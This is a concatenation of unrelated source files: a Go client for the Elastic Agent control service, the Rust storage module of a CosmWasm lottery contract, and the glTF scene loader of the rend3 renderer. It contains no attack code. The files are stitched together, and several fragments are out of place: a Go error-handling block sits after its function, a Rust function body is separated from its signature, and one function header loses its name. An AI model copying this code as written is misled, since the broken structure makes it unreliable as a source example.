running process meta-data. ProcMeta(ctx context.Context) ([]ProcMeta, error) } // client manages the state and communication to the Elastic Agent. type client struct { ctx context.Context cancel context.CancelFunc wg sync.WaitGroup client proto.ElasticAgentControlClient } // New creates a client connection to Elastic Agent. func New() Client { return &client{} } // Connect connects to the running Elastic Agent. func (c *client) Connect(ctx context.Context) error { c.ctx, c.cancel = context.WithCancel(ctx) conn, err := dialContext(ctx) if err != nil { return err } c.client = proto.NewElasticAgentControlClient(conn) return nil } // Disconnect disconnects from the running Elastic Agent. func (c *client) Disconnect() { if c.cancel != nil { c.cancel() c.wg.Wait() c.ctx = nil c.cancel = nil } } // Version returns the current version of the running agent. func (c *client) Version(ctx context.Context) (Version, error) { res, err := c.client.Version(ctx, &proto.Empty{}) if err != nil { return Version{}, err } bt, err := time.Parse(control.TimeFormat(), res.BuildTime) if err != nil { return Version{}, err } return Version{ Version: res.Version, Commit: res.Commit, BuildTime: bt, Snapshot: res.Snapshot, }, nil } // Status returns the current status of the running agent. func (c *client) Status(ctx context.Context) (*AgentStatus, error) { res, err := c.client.Status(ctx, &proto.Empty{}) if err != nil { return nil, err } s := &AgentStatus{ Status: res.Status, Message: res.Message, Applications: make([]*ApplicationStatus, len(res.Applications)), } for i, appRes := range res.Applications { var payload map[string]interface{} if appRes.Payload != "" { err := json.Unmarshal([]byte(appRes.Payload), &payload) if err != nil { return nil, err } } s.Applications[i] = &ApplicationStatus{ ID: appRes.Id, Name: appRes.Name, Status: appRes.Status, Message: appRes.Message, Payload: payload, } } return s, nil } // Restart triggers restarting the current running daemon. func (c *client) Restart(ctx context.Context) error { res, err := c.client.Restart(ctx, &proto.Empty{}) if err != nil { return err } if res.Status == proto.ActionStatus_FAILURE { return fmt.Errorf(res.Error) } return nil } // Upgrade triggers upgrade of the current running daemon. func (c *client) Upgrade(ctx context.Context, version string, sourceURI string) (string, error) { res, err := c.client.Upgrade(ctx, &proto.UpgradeRequest{ Version: version, SourceURI: sourceURI, }) if err != nil { return "", err } if res.Status == proto.ActionStatus_FAILURE { return "", fmt.Errorf(res.Error) } return res.Version, nil } // ProcMeta gathers running beat metadata. func (c *client) ProcMeta(ctx context.Context) ([]ProcMeta, error) { resp, err := c.client.ProcMeta(ctx, &proto.Empty{}) if err != nil { return nil, err } procMeta := []ProcMeta{} for _, proc := range resp.Procs { meta := ProcMeta{ Process: proc.Process, Name: proc.Name, Hostname: proc.Hostname, ID: proc.Id, EphemeralID: proc.EphemeralId, Version: proc.Version, BuildCommit: proc.BuildCommit, Username: proc.Username, UserID: proc.UserId, UserGID: proc.UserGid, BinaryArchitecture: proc.Architecture, RouteKey: proc.RouteKey, ElasticLicensed: proc.ElasticLicensed, Error: proc.Error, } if proc.BuildTime != "" { ts, err := time.Parse(time.RFC3339, proc.BuildTime) if err != nil
else { meta.BuildTime = ts } } procMeta = append(procMeta, meta) } return procMeta, nil }
{ if meta.Error != "" { meta.Error += ", " + err.Error() } else { meta.Error = err.Error() } }
state.rs
use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use cosmwasm_std::{CanonicalAddr, Storage, Uint128}; use cosmwasm_storage::{singleton, singleton_read, ReadonlySingleton, Singleton, bucket, bucket_read, Bucket, ReadonlyBucket}; pub static CONFIG_KEY: &[u8] = b"config"; static BALANCE_KEY: &[u8] = b"balance"; #[derive(Serialize, Deserialize, Clone, Debug, PartialEq, JsonSchema)] pub struct Entry { pub weight: Uint128, } #[derive(Serialize, Deserialize, Clone, Debug, PartialEq, JsonSchema)] pub struct State { pub entries: Vec<(CanonicalAddr, Uint128)>, // maps address to weight pub contract_owner: CanonicalAddr, pub seed: Vec<u8>, pub entropy: Vec<u8>, pub start_time: u64, pub winner1: CanonicalAddr, pub winner2: CanonicalAddr, pub winner3: CanonicalAddr, pub staked_tokens: Uint128, } pub fn config<S: Storage>(storage: &mut S) -> Singleton<S, State>
pub fn config_read<S: Storage>(storage: &S) -> ReadonlySingleton<S, State> { singleton_read(storage, CONFIG_KEY) } pub fn balance<S: Storage>(storage: &mut S) -> Bucket<S, Uint128> { bucket(BALANCE_KEY, storage) } pub fn balance_read<S: Storage>(storage: &S) -> ReadonlyBucket<S, Uint128> { bucket_read(BALANCE_KEY, storage) }
{ singleton(storage, CONFIG_KEY) }
lib.rs
//! gltf scene and model loader for rend3. //! //! This crate attempts to map the concepts into gltf as best it can into rend3, //! but there is quite a variety of things that would be insane to properly //! represent. //! //! To "just load a gltf/glb", look at the documentation for [`load_gltf`] and //! use the default [`filesystem_io_func`]. //! //! Individual components of a gltf can be loaded with the other functions in //! this crate. //! //! # Supported Extensions //! - `KHR_punctual_lights` //! - `KHR_texture_transform` //! - `KHR_material_unlit` //! //! # Known Limitations //! - Only the albedo texture's transform from `KHR_texture_transform` will be //! used. //! - Double sided materials are currently unsupported. use glam::{Mat3, Mat4, Quat, UVec2, Vec2, Vec3, Vec4}; use gltf::buffer::Source; use image::GenericImageView; use rend3::{ types::{self, Handedness, MeshValidationError, ObjectHandle, ObjectMeshKind, Skeleton, SkeletonHandle}, util::typedefs::{FastHashMap, SsoString}, Renderer, }; use rend3_routine::pbr; use std::{ borrow::Cow, collections::{hash_map::Entry, BTreeMap, HashMap, VecDeque}, future::Future, path::Path, }; use thiserror::Error; /// Wrapper around a T that stores an optional label. #[derive(Debug, Clone)] pub struct Labeled<T> { /// Inner value pub inner: T, /// Label associated with the T pub label: Option<SsoString>, } impl<T> Labeled<T> { /// Create a new pub fn new(inner: T, label: Option<&str>) -> Self { Self { inner, label: label.map(SsoString::from), } } } /// A single sub-mesh of a gltf. #[derive(Debug)] pub struct MeshPrimitive { pub handle: types::MeshHandle, /// Index into the material vector given by [`load_materials_and_textures`] /// or [`LoadedGltfScene::materials`]. pub material: Option<usize>, } /// Set of [`MeshPrimitive`]s that make up a logical mesh. #[derive(Debug)] pub struct Mesh { pub primitives: Vec<MeshPrimitive>, } /// A set of [`SkeletonHandle`]s, one per mesh in the wrapping object, plus the /// index of the skin data in the `skins` array of [`LoadedGltfScene`]. /// /// All the skeletons are guaranteed to have the same number of joints and /// structure, but deform different meshes of the object. #[derive(Debug, Clone)] pub struct Armature { /// The list of skeletons that are deforming this node's mesh primitives. pub skeletons: Vec<SkeletonHandle>, /// Index to the skin that contains the inverse bind matrices for the /// skeletons in this armature. pub skin_index: usize, } /// Set of [`ObjectHandle`]s that correspond to a logical object in the node /// tree. When the node corresponds to an animated mesh, the `armature` will /// contain the necessary data to deform the primitives. /// /// This is to a [`ObjectHandle`], as a [`Mesh`] is to a [`MeshPrimitive`]. #[derive(Debug, Clone)] pub struct Object { pub primitives: Vec<ObjectHandle>, pub armature: Option<Armature>, } /// Node in the gltf scene tree #[derive(Debug, Default, Clone)] pub struct Node { /// The index of the parent node in the nodes array, if any. pub parent: Option<usize>, /// The index of the children nodes in the nodes array pub children: Vec<usize>, /// Transform of this node relative to its parents. pub local_transform: Mat4, /// Object for this node. pub object: Option<Labeled<Object>>, /// Directional light for this node. pub directional_light: Option<types::DirectionalLightHandle>, } /// Hashmap key for caching images. #[derive(Debug, Copy, Clone, PartialEq, Eq, Hash)] pub struct ImageKey { /// Index into the image array. pub index: usize, /// If the image should be viewed as srgb or not. pub srgb: bool, } /// A uploaded texture and its format. #[derive(Debug, Clone, PartialEq, Eq)] pub struct Texture { pub handle: types::TextureHandle, pub format: types::TextureFormat, } #[derive(Debug)] pub struct Joint { pub node_idx: usize, } #[derive(Debug)] pub struct Skin { pub inverse_bind_matrices: Vec<Mat4>, pub joints: Vec<Labeled<Joint>>, } #[derive(Debug)] pub struct AnimationChannel<T> { pub values: Vec<T>, pub times: Vec<f32>, } /// Animation data for a single joint, with translation, rotation and scale /// channels. #[derive(Debug)] pub struct PosRotScale { pub node_idx: u32, pub translation: Option<AnimationChannel<Vec3>>, pub rotation: Option<AnimationChannel<Quat>>, pub scale: Option<AnimationChannel<Vec3>>, } impl PosRotScale { pub fn new(node_idx: u32) -> Self { Self { node_idx, translation: None, rotation: None, scale: None, } } } #[derive(Debug)] pub struct Animation { /// Maps the node index of a joint to its animation keyframe data. pub channels: HashMap<usize, PosRotScale>, /// The total duration of the animation. Computed as the maximum time of any /// keyframe on any channel. pub duration: f32, } /// Hashmap which stores a mapping from [`ImageKey`] to a labeled handle. pub type ImageMap = FastHashMap<ImageKey, Labeled<Texture>>; /// Loaded data on a gltf scene that can be reused across multiple instances of /// the same set of objects. #[derive(Debug)] pub struct LoadedGltfScene { pub meshes: Vec<Labeled<Mesh>>, pub materials: Vec<Labeled<types::MaterialHandle>>, pub default_material: types::MaterialHandle, pub images: ImageMap, pub skins: Vec<Labeled<Skin>>, pub animations: Vec<Labeled<Animation>>, } /// Data specific to each instance of a gltf scene. pub struct GltfSceneInstance { /// The flat list of nodes in the scene. Each node points to a list of /// children and optionally a parent using indices. pub nodes: Vec<Labeled<Node>>, /// Iterating the `nodes` following the order in this list guarantees that /// parents will always be visited before children. This allows avoiding /// recursion in several algorithms. pub topological_order: Vec<usize>, } /// Describes how loading gltf failed. #[derive(Debug, Error)] pub enum GltfLoadError<E: std::error::Error + 'static> { #[error("Gltf parsing or validation error")] Gltf(#[from] gltf::Error), #[error("Buffer {0} failed to be loaded from the fs")] BufferIo(SsoString, #[source] E), #[error("Texture {0} failed to be loaded from the fs")] TextureIo(SsoString, #[source] E), #[error("Texture {0} failed to be loaded as an image")] TextureDecode(SsoString, #[source] image::ImageError), #[cfg(feature = "ddsfile")] #[error("Texture {0} failed to be loaded as a ddsfile due to incompatible dxgi format {1:?}")] TextureBadDxgiFormat(SsoString, ddsfile::DxgiFormat), #[cfg(feature = "ddsfile")] #[error("Texture {0} failed to be loaded as a ddsfile due to incompatible d3d format {1:?}")] TextureBadD3DFormat(SsoString, ddsfile::D3DFormat), #[cfg(feature = "ktx2")] #[error("Texture {0} failed to be loaded as a ktx2 file due to incompatible format {1:?}")] TextureBadKxt2Format(SsoString, ktx2::Format), #[error("Texture {0} failed to be loaded as it has 0 levels")] TextureZeroLevels(SsoString), #[error("Texture {0} failed to be loaded as it has 0 layers")] TextureTooManyLayers(SsoString), #[error("Rend3-gltf expects gltf files to have a single scene.")] GltfSingleSceneOnly, #[error("Mesh {0} does not have positions")] MissingPositions(usize), #[error("Gltf file references mesh {0} but mesh does not exist")] MissingMesh(usize), #[error("Gltf file references skin {0} but skin does not exist")] MissingSkin(usize), #[error("Gltf file references material {0} but material does not exist")] MissingMaterial(usize), #[error("Mesh {0} primitive {1} uses unsupported mode {2:?}. Only triangles are supported")] UnsupportedPrimitiveMode(usize, usize, gltf::mesh::Mode), #[error("Mesh {0} failed validation")] MeshValidationError(usize, #[source] MeshValidationError), #[error("Animation {0} channel {1} does not have keyframe times.")] MissingKeyframeTimes(usize, usize), #[error("Animation {0} channel {1} does not have keyframe values.")] MissingKeyframeValues(usize, usize), } /// Default implementation of [`load_gltf`]'s `io_func` that loads from the /// filesystem relative to the gltf. /// /// The first argumnet is the directory all relative paths should be considered /// against. This is more than likely the directory the gltf/glb is in. pub async fn filesystem_io_func(parent_directory: impl AsRef<Path>, uri: SsoString) -> Result<Vec<u8>, std::io::Error> { let octet_stream_header = "data:"; if let Some(base64_data) = uri.strip_prefix(octet_stream_header) { let (_mime, rest) = base64_data.split_once(';').unwrap(); let (encoding, data) = rest.split_once(',').unwrap(); assert_eq!(encoding, "base64"); // profiling::scope!("decoding base64 uri"); log::info!("loading {} bytes of base64 data", data.len()); // TODO: errors Ok(base64::decode(data).unwrap()) } else { let path_resolved = parent_directory.as_ref().join(&*uri); let display = path_resolved.as_os_str().to_string_lossy(); // profiling::scope!("loading file", &display); log::info!("loading file '{}' from disk", &display); std::fs::read(path_resolved) } } /// Determines parameters that are given to various parts of the gltf world that /// cannot be specified by gltf alone. #[derive(Copy, Clone)] pub struct GltfLoadSettings { /// Global scale applied to all objects (default: 1) pub scale: f32, /// Size of the shadow map in world space (default: 100) pub directional_light_shadow_distance: f32, /// Coordinate space normal maps should use (default Up) pub normal_direction: pbr::NormalTextureYDirection, /// Enable built-in directional lights (default true) pub enable_directional: bool, } impl Default for GltfLoadSettings { fn default() -> Self { Self { scale: 1.0, directional_light_shadow_distance: 100.0, normal_direction: pbr::NormalTextureYDirection::Up, enable_directional: true, } } } /// Load a given gltf into the renderer's world. /// /// Allows the user to specify how URIs are resolved into their underlying data. /// Supports most gltfs and glbs. /// /// **Must** keep the [`LoadedGltfScene`] alive for the scene to remain. /// /// See [`load_gltf_data`] and [`instance_loaded_scene`] if you need more /// fine-grained control about how and when the scene data is instanced. /// /// ```no_run /// # use std::path::Path; /// # let renderer = unimplemented!(); /// let path = Path::new("some/path/scene.gltf"); // or glb /// let gltf_data = std::fs::read(&path).unwrap(); /// let parent_directory = path.parent().unwrap(); /// let _loaded = pollster::block_on(rend3_gltf::load_gltf( /// &renderer, /// &gltf_data, /// &rend3_gltf::GltfLoadSettings::default(), /// |p| rend3_gltf::filesystem_io_func(&parent_directory, p) /// )); /// ``` pub async fn load_gltf<F, Fut, E>( renderer: &Renderer, data: &[u8], settings: &GltfLoadSettings, io_func: F, ) -> Result<(LoadedGltfScene, GltfSceneInstance), GltfLoadError<E>> where F: FnMut(SsoString) -> Fut, Fut: Future<Output = Result<Vec<u8>, E>>, E: std::error::Error + 'static, { // profiling::scope!("loading gltf"); let mut file = { // profiling::scope!("parsing gltf"); gltf::Gltf::from_slice_without_validation(data)? }; let loaded = load_gltf_data(renderer, &mut file, settings, io_func).await?; if file.scenes().len() != 1 { return Err(GltfLoadError::GltfSingleSceneOnly); } let instance = instance_loaded_scene( renderer, &loaded, file.nodes().collect(), settings, Mat4::from_scale(Vec3::new( settings.scale, settings.scale, if renderer.handedness == Handedness::Left { -settings.scale } else { settings.scale }, )), )?; Ok((loaded, instance)) } /// Load a given gltf's data, like meshes and materials, without yet adding /// any of the nodes to the scene. /// /// Allows the user to specify how URIs are resolved into their underlying data. /// Supports most gltfs and glbs. /// /// **Must** keep the [`LoadedGltfScene`] alive for the meshes and materials pub async fn load_gltf_data<F, Fut, E>( renderer: &Renderer, file: &mut gltf::Gltf, settings: &GltfLoadSettings, mut io_func: F, ) -> Result<LoadedGltfScene, GltfLoadError<E>> where F: FnMut(SsoString) -> Fut, Fut: Future<Output = Result<Vec<u8>, E>>, E: std::error::Error + 'static, { // profiling::scope!("loading gltf data"); let blob = file.blob.take(); let buffers = load_buffers(file.buffers(), blob, &mut io_func).await?; let default_material = load_default_material(renderer); let meshes = load_meshes(renderer, file.meshes(), &buffers)?; let (materials, images) = load_materials_and_textures(renderer, file.materials(), &buffers, settings, &mut io_func).await?; let skins = load_skins(file.skins(), &buffers)?; let animations = load_animations(file.animations(), &buffers)?; let loaded = LoadedGltfScene { meshes, materials, default_material, images, skins, animations, }; Ok(loaded) } /// Adds a single mesh from the [`LoadedGltfScene`] found by its index, /// as an object to the scene. pub fn add_mesh_by_index<E: std::error::Error + 'static>( renderer: &Renderer, loaded: &LoadedGltfScene, mesh_index: usize, name: Option<&str>, skin_index: Option<usize>, transform: Mat4, ) -> Result<Labeled<Object>, GltfLoadError<E>> { let mesh_handle = loaded .meshes .get(mesh_index) .ok_or(GltfLoadError::MissingMesh(mesh_index))?; let mut primitives = Vec::new(); let mut skeletons = Vec::new(); let skin = if let Some(skin_index) = skin_index { let skin = loaded .skins .get(skin_index) .ok_or(GltfLoadError::MissingSkin(skin_index))?; Some(skin) } else { None }; for prim in &mesh_handle.inner.primitives { let mat_idx = prim.material; let mat = mat_idx .map_or_else( || Some(&loaded.default_material), |mat_idx| loaded.materials.get(mat_idx).map(|m| &m.inner), ) .ok_or_else(|| GltfLoadError::MissingMaterial(mat_idx.expect("Could not find default material")))?; let mesh_kind = if let Some(skin) = skin { let skeleton = renderer.add_skeleton(Skeleton { // We don't need to use the inverse bind matrices. At rest pose, every // joint matrix is inv_bind_pose * bind_pose, thus the identity matrix. joint_matrices: vec![Mat4::IDENTITY; skin.inner.inverse_bind_matrices.len()], mesh: prim.handle.clone(), }); skeletons.push(skeleton.clone()); ObjectMeshKind::Animated(skeleton) } else { ObjectMeshKind::Static(prim.handle.clone()) }; primitives.push(renderer.add_object(types::Object { mesh_kind, material: mat.clone(), transform, })); } Ok(Labeled::new( Object { primitives, armature: skin_index.map(|skin_index| Armature { skeletons, skin_index }), }, name, )) } /// Computes topological ordering and children->parent map. fn node_indices_topological_sort(nodes: &[gltf::Node]) -> (Vec<usize>, BTreeMap<usize, usize>) { // NOTE: The algorithm uses BTreeMaps to guarantee consistent ordering. // Maps parent to list of children let mut children = BTreeMap::<usize, Vec<usize>>::new(); for node in nodes { children.insert(node.index(), node.children().map(|n| n.index()).collect()); } // Maps child to parent let parents: BTreeMap<usize, usize> = children .iter() .flat_map(|(parent, children)| children.iter().map(|ch| (*ch, *parent))) .collect(); // Initialize the BFS queue with nodes that don't have any parent (i.e. roots) let mut queue: VecDeque<usize> = children.keys().filter(|n| parents.get(n).is_none()).cloned().collect(); let mut topological_sort = Vec::<usize>::new(); while let Some(n) = queue.pop_front() { topological_sort.push(n); for ch in &children[&n] { queue.push_back(*ch); } } (topological_sort, parents) } /// Instances a Gltf scene that has been loaded using [`load_gltf_data`]. Will /// create as many [`Object`]s as required. /// /// You need to hold onto the returned value from this function to make sure the /// objects don't get deleted. pub fn instance_loaded_scene<'a, E: std::error::Error + 'static>( renderer: &Renderer, loaded: &LoadedGltfScene, nodes: Vec<gltf::Node<'a>>, settings: &GltfLoadSettings, parent_transform: Mat4, ) -> Result<GltfSceneInstance, GltfLoadError<E>> { let (topological_order, parents) = node_indices_topological_sort(&nodes); let num_nodes = nodes.len(); debug_assert_eq!(topological_order.len(), num_nodes); let mut node_transforms = vec![Mat4::IDENTITY; num_nodes]; let mut final_nodes = vec![Labeled::new(Node::default(), None); nodes.len()]; for node_idx in topological_order.iter() { let node = &nodes[*node_idx]; let local_transform = Mat4::from_cols_array_2d(&node.transform().matrix()); let parent_transform = parents .get(&node.index()) .map(|p| node_transforms[*p]) .unwrap_or(parent_transform); let transform = parent_transform * local_transform; node_transforms[*node_idx] = transform; let object = if let Some(mesh) = node.mesh() { Some(add_mesh_by_index( renderer, loaded, mesh.index(), mesh.name(), node.skin().map(|s| s.index()), transform, )?) } else { None }; let light = if let Some(light) = node.light() { match light.kind() { gltf::khr_lights_punctual::Kind::Directional if settings.enable_directional => { let direction = transform.transform_vector3(-Vec3::Z); Some(renderer.add_directional_light(types::DirectionalLight { color: Vec3::from(light.color()), intensity: light.intensity(), direction, distance: settings.directional_light_shadow_distance, })) } _ => None, } } else { None }; let children = node.children().map(|node| node.index()).collect(); final_nodes[*node_idx] = Labeled::new( Node { parent: parents.get(&node.index()).cloned(), children, local_transform, object, directional_light: light, }, node.name(), ) } Ok(GltfSceneInstance { nodes: final_nodes, topological_order, }) } /// Loads buffers from a [`gltf::Buffer`] iterator, calling io_func to resolve /// them from URI. /// /// If the gltf came from a .glb, the glb's blob should be provided. /// /// # Panics /// /// Panics if buffers requires a blob but no blob was given. pub async fn load_buffers<F, Fut, E>( file: impl ExactSizeIterator<Item = gltf::Buffer<'_>>, blob: Option<Vec<u8>>, mut io_func: F, ) -> Result<Vec<Vec<u8>>, GltfLoadError<E>> where F: FnMut(SsoString) -> Fut, Fut: Future<Output = Result<Vec<u8>, E>>, E: std::error::Error + 'static, { // profiling::scope!("loading buffers"); let mut buffers = Vec::with_capacity(file.len()); let mut blob_index = None; for b in file { let data = match b.source() { Source::Bin => { blob_index = Some(b.index()); Vec::new() } Source::Uri(uri) => io_func(SsoString::from(uri)) .await .map_err(|e| GltfLoadError::BufferIo(SsoString::from(uri), e))?, }; buffers.push(data); } if let Some(blob_index) = blob_index { buffers[blob_index] = blob.expect("glb blob not found, but gltf expected it"); } Ok(buffers) } /// Loads meshes from a [`gltf::Mesh`] iterator. /// /// All binary data buffers must be provided. Call this with /// [`gltf::Document::meshes`] as the mesh argument. pub fn load_meshes<'a, E: std::error::Error + 'static>( renderer: &Renderer, meshes: impl Iterator<Item = gltf::Mesh<'a>>, buffers: &[Vec<u8>], ) -> Result<Vec<Labeled<Mesh>>, GltfLoadError<E>> { profiling::scope!("loading meshes"); meshes .into_iter() .map(|mesh| { let mut res_prims = Vec::new(); for prim in mesh.primitives() { if prim.mode() != gltf::mesh::Mode::Triangles { return Err(GltfLoadError::UnsupportedPrimitiveMode( mesh.index(), prim.index(), prim.mode(), )); } let reader = prim.reader(|b| Some(&buffers[b.index()][..b.length()])); let vertex_positions: Vec<_> = reader .read_positions() .ok_or_else(|| GltfLoadError::MissingPositions(mesh.index()))? .map(Vec3::from) .collect(); // glTF models are right handed, so we must flip their winding order let mut builder = types::MeshBuilder::new(vertex_positions, renderer.handedness); if renderer.handedness == Handedness::Left { builder = builder.with_flip_winding_order(); } if let Some(normals) = reader.read_normals() { builder = builder.with_vertex_normals(normals.map(Vec3::from).collect()) } if let Some(tangents) = reader.read_tangents() { // todo: handedness builder = builder.with_vertex_tangents(tangents.map(|[x, y, z, _]| Vec3::new(x, y, z)).collect()) } if let Some(uvs) = reader.read_tex_coords(0) { builder = builder.with_vertex_uv0(uvs.into_f32().map(Vec2::from).collect()) } if let Some(uvs) = reader.read_tex_coords(1) { builder = builder.with_vertex_uv1(uvs.into_f32().map(Vec2::from).collect()) } if let Some(colors) = reader.read_colors(0) { builder = builder.with_vertex_colors(colors.into_rgba_u8().collect()) } if let Some(indices) = reader.read_indices() { builder = builder.with_indices(indices.into_u32().collect()) } if let Some(joint_indices) = reader.read_joints(0) { builder = builder.with_vertex_joint_indices(joint_indices.into_u16().collect()) } if let Some(joint_weights) = reader.read_weights(0) { builder = builder.with_vertex_joint_weights(joint_weights.into_f32().map(Vec4::from).collect()) } let mesh = builder .build() .map_err(|valid| GltfLoadError::MeshValidationError(mesh.index(), valid))?; let handle = renderer.add_mesh(mesh); res_prims.push(MeshPrimitive { handle, material: prim.material().index(), }) } Ok(Labeled::new(Mesh { primitives: res_prims }, mesh.name())) }) .collect() } fn load_skins<E: std::error::Error + 'static>( skins: gltf::iter::Skins, buffers: &[Vec<u8>], ) -> Result<Vec<Labeled<Skin>>, GltfLoadError<E>> { let mut res_skins = vec![]; for skin in skins { let num_joints = skin.joints().count(); let reader = skin.reader(|b| Some(&buffers[b.index()][..b.length()])); let inv_b_mats = if let Some(inv_b_mats) = reader.read_inverse_bind_matrices() { inv_b_mats.map(|mat| Mat4::from_cols_array_2d(&mat)).collect() } else { // The inverse bind matrices are sometimes not provided. This has to // be interpreted as all of them being the identity transform. vec![Mat4::IDENTITY; num_joints] }; let joints = skin .joints() .map(|node| Labeled::new(Joint { node_idx: node.index() }, node.name())) .collect(); res_skins.push(Labeled::new( Skin { inverse_bind_matrices: inv_b_mats, joints, }, skin.name(), )) } Ok(res_skins) } fn
(channels: &HashMap<usize, PosRotScale>) -> f32 { fn channel_duration<T>(channel: &AnimationChannel<T>) -> f32 { channel .times .iter() .copied() .map(float_ord::FloatOrd) .max() .map(|f_ord| f_ord.0) .unwrap_or(0.0) } channels .values() .map(|ch| { let m1 = ch.translation.as_ref().map(channel_duration).unwrap_or(0.0); let m2 = ch.rotation.as_ref().map(channel_duration).unwrap_or(0.0); let m3 = ch.scale.as_ref().map(channel_duration).unwrap_or(0.0); m1.max(m2).max(m3) }) .map(float_ord::FloatOrd) .max() .map(|x| x.0) .unwrap_or(0.0) } fn load_animations<E: std::error::Error + 'static>( animations: gltf::iter::Animations, buffers: &[Vec<u8>], ) -> Result<Vec<Labeled<Animation>>, GltfLoadError<E>> { let mut result = Vec::new(); for anim in animations { let mut result_channels = HashMap::<usize, PosRotScale>::new(); for (ch_idx, ch) in anim.channels().enumerate() { let target = ch.target(); let node_idx = target.node().index(); // Get the PosRotScale for the current target node or create a new // one if it doesn't exist. let chs = result_channels .entry(node_idx) .or_insert_with(|| PosRotScale::new(node_idx as u32)); let reader = ch.reader(|b| Some(&buffers[b.index()][..b.length()])); // In gltf, 'inputs' refers to the keyframe times let times = reader .read_inputs() .ok_or_else(|| GltfLoadError::MissingKeyframeTimes(anim.index(), ch_idx))? .collect(); // And 'outputs' means the keyframe values, which varies depending on the type // of keyframe match reader .read_outputs() .ok_or_else(|| GltfLoadError::MissingKeyframeValues(anim.index(), ch_idx))? { gltf::animation::util::ReadOutputs::Translations(trs) => { chs.translation = Some(AnimationChannel { values: trs.map(Vec3::from).collect(), times, }) } gltf::animation::util::ReadOutputs::Rotations(rots) => { chs.rotation = Some(AnimationChannel { values: rots.into_f32().map(Quat::from_array).collect(), times, }); } gltf::animation::util::ReadOutputs::Scales(scls) => { chs.scale = Some(AnimationChannel { values: scls.map(Vec3::from).collect(), times, }); } gltf::animation::util::ReadOutputs::MorphTargetWeights(_) => { // TODO } } } result.push(Labeled::new( Animation { duration: compute_animation_duration(&result_channels), channels: result_channels, }, anim.name(), )) } Ok(result) } /// Creates a gltf default material. pub fn load_default_material(renderer: &Renderer) -> types::MaterialHandle { profiling::scope!("creating default material"); renderer.add_material(pbr::PbrMaterial { albedo: pbr::AlbedoComponent::Value(Vec4::splat(1.0)), transparency: pbr::Transparency::Opaque, normal: pbr::NormalTexture::None, aomr_textures: pbr::AoMRTextures::None, ao_factor: Some(1.0), metallic_factor: Some(1.0), roughness_factor: Some(1.0), clearcoat_textures: pbr::ClearcoatTextures::None, clearcoat_factor: Some(1.0), clearcoat_roughness_factor: Some(1.0), emissive: pbr::MaterialComponent::None, reflectance: pbr::MaterialComponent::None, anisotropy: pbr::MaterialComponent::None, uv_transform0: Mat3::IDENTITY, uv_transform1: Mat3::IDENTITY, unlit: false, sample_type: pbr::SampleType::Linear, }) } /// Loads materials and textures from a [`gltf::Material`] iterator. /// /// All binary data buffers must be provided. Call this with /// [`gltf::Document::materials`] as the materials argument. /// /// io_func determines how URIs are resolved into their underlying data. pub async fn load_materials_and_textures<F, Fut, E>( renderer: &Renderer, materials: impl ExactSizeIterator<Item = gltf::Material<'_>>, buffers: &[Vec<u8>], settings: &GltfLoadSettings, io_func: &mut F, ) -> Result<(Vec<Labeled<types::MaterialHandle>>, ImageMap), GltfLoadError<E>> where F: FnMut(SsoString) -> Fut, Fut: Future<Output = Result<Vec<u8>, E>>, E: std::error::Error + 'static, { // profiling::scope!("loading materials and textures"); let mut images = ImageMap::default(); let mut result = Vec::with_capacity(materials.len()); for material in materials { // profiling::scope!("load material", material.name().unwrap_or_default()); let pbr = material.pbr_metallic_roughness(); let albedo = pbr.base_color_texture(); let albedo_factor = pbr.base_color_factor(); let occlusion = material.occlusion_texture(); let emissive = material.emissive_texture(); let emissive_factor = material.emissive_factor(); let normals = material.normal_texture(); let roughness_factor = pbr.roughness_factor(); let metallic_factor = pbr.metallic_factor(); let metallic_roughness = pbr.metallic_roughness_texture(); let nearest = albedo .as_ref() .map(|i| match i.texture().sampler().mag_filter() { Some(gltf::texture::MagFilter::Nearest) => pbr::SampleType::Nearest, Some(gltf::texture::MagFilter::Linear) => pbr::SampleType::Linear, None => pbr::SampleType::Linear, }) .unwrap_or_default(); let uv_transform = albedo .as_ref() .and_then(|i| { let transform = i.texture_transform()?; Some(Mat3::from_scale_angle_translation( transform.scale().into(), transform.rotation(), transform.offset().into(), )) }) .unwrap_or(Mat3::IDENTITY); let albedo_tex = util::texture_option_resolve( albedo.map(|i| load_image_cached(renderer, &mut images, i.texture().source(), true, buffers, io_func)), ) .await?; let occlusion_tex = util::texture_option_resolve( occlusion.map(|i| load_image_cached(renderer, &mut images, i.texture().source(), false, buffers, io_func)), ) .await?; let emissive_tex = util::texture_option_resolve( emissive.map(|i| load_image_cached(renderer, &mut images, i.texture().source(), true, buffers, io_func)), ) .await?; let normals_tex = util::texture_option_resolve( normals.map(|i| load_image_cached(renderer, &mut images, i.texture().source(), false, buffers, io_func)), ) .await?; let metallic_roughness_tex = util::texture_option_resolve( metallic_roughness .map(|i| load_image_cached(renderer, &mut images, i.texture().source(), false, buffers, io_func)), ) .await?; let handle = renderer.add_material(pbr::PbrMaterial { albedo: match albedo_tex { Some(tex) => pbr::AlbedoComponent::TextureVertexValue { texture: tex.handle, value: Vec4::from(albedo_factor), srgb: false, }, None => pbr::AlbedoComponent::ValueVertex { value: Vec4::from(albedo_factor), srgb: false, }, }, transparency: match material.alpha_mode() { gltf::material::AlphaMode::Opaque => pbr::Transparency::Opaque, gltf::material::AlphaMode::Mask => pbr::Transparency::Cutout { cutout: material.alpha_cutoff().unwrap_or(0.5), }, gltf::material::AlphaMode::Blend => pbr::Transparency::Blend, }, normal: match normals_tex { Some(tex) if tex.format.describe().components == 2 => { pbr::NormalTexture::Bicomponent(tex.handle, settings.normal_direction) } Some(tex) if tex.format.describe().components >= 3 => { pbr::NormalTexture::Tricomponent(tex.handle, settings.normal_direction) } _ => pbr::NormalTexture::None, }, aomr_textures: match (metallic_roughness_tex, occlusion_tex) { (Some(mr), Some(ao)) if mr == ao => pbr::AoMRTextures::Combined { texture: Some(mr.handle), }, (mr, ao) if ao .as_ref() .map(|ao| ao.format.describe().components < 3) .unwrap_or(false) => { pbr::AoMRTextures::Split { mr_texture: util::extract_handle(mr), ao_texture: util::extract_handle(ao), } } (mr, ao) => pbr::AoMRTextures::SwizzledSplit { mr_texture: util::extract_handle(mr), ao_texture: util::extract_handle(ao), }, }, metallic_factor: Some(metallic_factor), roughness_factor: Some(roughness_factor), emissive: match emissive_tex { Some(tex) => pbr::MaterialComponent::TextureValue { texture: tex.handle, value: Vec3::from(emissive_factor), }, None => pbr::MaterialComponent::Value(Vec3::from(emissive_factor)), }, uv_transform0: uv_transform, uv_transform1: uv_transform, unlit: material.unlit(), sample_type: nearest, ..pbr::PbrMaterial::default() }); result.push(Labeled::new(handle, material.name())); } Ok((result, images)) } 